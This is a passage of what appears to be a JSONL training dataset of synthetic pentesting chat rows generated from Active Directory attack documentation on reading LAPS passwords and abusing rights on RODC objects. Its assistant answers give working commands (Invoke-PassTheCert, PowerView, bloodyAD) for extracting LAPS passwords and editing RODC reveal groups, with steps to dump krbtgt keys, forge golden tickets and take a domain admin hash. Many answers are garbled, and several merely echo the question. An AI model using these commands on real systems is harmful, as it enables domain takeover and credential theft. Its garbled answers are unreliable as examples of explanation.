"[SharpLAPS](https://github.com/swisskyrepo/SharpLAPS) (C#) automates that process."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "response": "[SharpLAPS](https://github.com/swisskyrepo/SharpLAPS) (C#) automates that process.", "metadata": {"corpus_index": 459, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[SharpLAPS](https://github.com/swisskyrepo/SharpLAPS) (C#) automates that process.`?"}, {"role": "assistant", "content": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[SharpLAPS](https://github.com/swisskyrepo/SharpLAPS) (C#) automates that process.`?", "response": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "metadata": {"corpus_index": 459, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 1) work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope 'Subtree' -Properties '' -LDAPFilter '(|(ms-Mcs-AdmPwd=)(ms-Mcs-AdmPwdExpirationTime=)(msLAPS-PasswordExpirationTime=))'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 1) work?", "response": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope 'Subtree' -Properties '' -LDAPFilter '(|(ms-Mcs-AdmPwd=)(ms-Mcs-AdmPwdExpirationTime=)(msLAPS-PasswordExpirationTime=))'", "metadata": {"corpus_index": 460, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 1)"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope 'Subtree' -Properties '' -LDAPFilter '(|(ms-Mcs-AdmPwd=)(ms-Mcs-AdmPwdExpirationTime=)(msLAPS-PasswordExpirationTime=))'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 1)", "response": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope 'Subtree' -Properties '' -LDAPFilter '(|(ms-Mcs-AdmPwd=)(ms-Mcs-AdmPwdExpirationTime=)(msLAPS-PasswordExpirationTime=))'", "metadata": {"corpus_index": 460, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 2, same as method 1) work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'LAPS' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 2, same as method 1) work?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'LAPS' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::", "metadata": {"corpus_index": 461, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 2, same as method 1)"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'LAPS' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Returns all readable LAPS Passwords in the 'ADLAB.LOCAL' Domain (method 2, same as method 1)", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'LAPS' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::", "metadata": {"corpus_index": 461, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Rights on RODC object"}, {"role": "assistant", "content": "With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.\n\n> [!TIP]\n> For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:\n> \n> * GenericWrite\n> * GenericAll / FullControl\n> * WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)\n> * Owns (c.f. WriteDacl)\n> * WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)\n> * WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.\n\n``bash\npowerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"\n`\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Rights on RODC object", "response": "With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.\n\n> [!TIP]\n> For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:\n> \n> * GenericWrite\n> * GenericAll / FullControl\n> * WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)\n> * Owns (c.f. WriteDacl)\n> * WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)\n> * WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.\n\n``bash\npowerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"\n`\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash", "metadata": {"corpus_index": 462, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Rights on RODC object"}, {"role": "assistant", "content": "With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.\n\n> [!TIP]\n> For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:\n> \n> * GenericWrite\n> * GenericAll / FullControl\n> * WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)\n> * Owns (c.f. WriteDacl)\n> * WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)\n> * WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.\n\n``bash\npowerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"\n`\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Rights on RODC object", "response": "With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.\n\n> [!TIP]\n> For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:\n> \n> * GenericWrite\n> * GenericAll / FullControl\n> * WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)\n> * Owns (c.f. WriteDacl)\n> * WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)\n> * WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.\n\n``bash\npowerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"\n`\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash", "metadata": {"corpus_index": 462, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use powerview for rights on rodc object?"}, {"role": "assistant", "content": "powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use powerview for rights on rodc object?", "response": "powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"", "metadata": {"corpus_index": 463, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "powerview"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Rights on RODC object during a pentest?"}, {"role": "assistant", "content": "powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Rights on RODC object during a pentest?", "response": "powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"", "metadata": {"corpus_index": 463, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"`?"}, {"role": "assistant", "content": "This command is used for rights on rodc object. Rights on RODC object"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `powerview \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"RODC_FQDN\"`?", "response": "This command is used for rights on rodc object. Rights on RODC object", "metadata": {"corpus_index": 463, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Rights on RODC object"}, {"role": "assistant", "content": "#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Rights on RODC object", "response": "#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\n#Then, append the Allowed RODC Password Replication Group group\nSet-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'\nSet-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup", "metadata": {"corpus_index": 464, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Get original msDS-RevealOnDemandGroup values?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup\ndistinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local\nmsDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Get original msDS-RevealOnDemandGroup values?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup\ndistinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local\nmsDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local", "metadata": {"corpus_index": 465, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Get original msDS-RevealOnDemandGroup values?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup\ndistinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local\nmsDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Get original msDS-RevealOnDemandGroup values?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup\ndistinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local\nmsDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local", "metadata": {"corpus_index": 465, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Add the previous value plus the admin account?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-NeverRevealGroup\n``\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n=== Windows\n\nFrom Windows systems, PowerView (PowerShell) can be used for this purpose.\n\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'\n`\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy` attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Add the previous value plus the admin account?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-NeverRevealGroup\n``\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n=== Windows\n\nFrom Windows systems, PowerView (PowerShell) can be used for this purpose.\n\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'\n`\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy` attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n:::", "metadata": {"corpus_index": 466, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Add the previous value plus the admin account"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-NeverRevealGroup\n``\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n=== Windows\n\nFrom Windows systems, PowerView (PowerShell) can be used for this purpose.\n\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'\n`\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy` attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Add the previous value plus the admin account", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object 'RODC-server$' --attr msDS-NeverRevealGroup\n``\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n=== Windows\n\nFrom Windows systems, PowerView (PowerShell) can be used for this purpose.\n\n`powershell\n#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}\n\n#If needed, remove the admin from the msDS-NeverRevealGroup attribute\nSet-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'\n`\n\nThen, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy` attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.\n\n:::", "metadata": {"corpus_index": 466, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/rights-on-rodc-object.md", "page_title": "Rights on RODC object", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Add the previous value plus the admin account during a pentest?"}, {"role": "assistant", "content": "Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](../kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list 